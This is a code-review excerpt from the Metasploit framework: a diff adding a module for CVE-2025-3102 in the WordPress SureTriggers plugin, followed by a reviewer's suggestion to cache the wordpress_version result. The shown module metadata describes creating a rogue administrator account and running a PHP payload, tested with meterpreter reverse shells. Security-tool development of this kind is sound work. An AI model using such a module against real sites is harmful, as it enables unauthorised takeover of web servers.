modules/exploits/multi/http/wp_suretriggers_auth_bypass.rb

```diff
@@ -0,0 +1,177 @@
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'WordPress SureTriggers Auth Bypass and RCE',
+        'Description' => %q{
+          This module exploits an authorization bypass in the WordPress SureTriggers plugin (<= 1.0.78).
+          It first creates a new administrator account via the unauthenticated REST endpoint,
+          then uploads and executes a PHP payload using FileDropper for remote code execution.
+        },
+        'Author' => [
+          'Michael Mazzolini (mikemyers)', # Vulnerability Discovery
+          'Khaled Alenazi (Nxploited)',    # PoC
+          'Valentin Lobstein'              # Metasploit module
+        ],
+        'References' => [
+          ['CVE', '2025-3102'],
+          ['URL', 'https://github.com/Nxploited/CVE-2025-3102'],
+          ['URL', 'https://www.wordfence.com/blog/2025/04/100000-wordpress-sites-affected-by-administrative-user-creation-vulnerability-in-suretriggers-wordpress-plugin/']
+        ],
+        'License' => MSF_LICENSE,
+        'Privileged' => false,
+        'Platform' => %w[unix linux win php],
+        'Arch' => [ARCH_PHP, ARCH_CMD],
+        'Targets' => [
+          [
+            'PHP In-Memory',
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP
+              # tested with php/meterpreter/reverse_tcp
+            }
+          ],
+          [
+            'Unix In-Memory',
+            {
+              'Platform' => %w[unix linux],
+              'Arch' => ARCH_CMD
+              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
+            }
+          ],
+          [
+            'Windows In-Memory',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2025-03-13',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+      )
+
+    register_options(
+      [
+        OptString.new('WP_USER', [true, 'Username for the new administrator', Faker::Internet.username(specifier: 5..8)]),
+        OptString.new('WP_PASS', [true, 'Password for the new administrator', Faker::Internet.password(min_length: 12)]),
+        OptString.new('WP_EMAIL', [true, 'Email for the new administrator', Faker::Internet.email(name: Faker::Internet.username(specifier: 5..8))]),
+        OptString.new('ST_AUTH', [false, 'Value for st_authorization header', ''])
+      ]
+    )
+  end
+
+  def check
+    return CheckCode::Unknown('Target not responding') unless wordpress_and_online?
+
+    print_status("Detected WordPress version: #{wordpress_version}") if wordpress_version
```

Comment:
The `wordpress_version` method can  request up to 7 URLs each time it is called:

https://github.com/rapid7/metasploit-framework/blob/b5129fe19874e74d5a103bb9d1372fb30f618b32/lib/msf/core/exploit/remote/http/wordpress/version.rb#L11-L41

Caching the return value would potentially save up to 6 HTTP requests in a worst-case scenario.

```suggestion
    wp_version = wordpress_version
    print_status("Detected WordPress version: #{wp_version}") if wp_version
```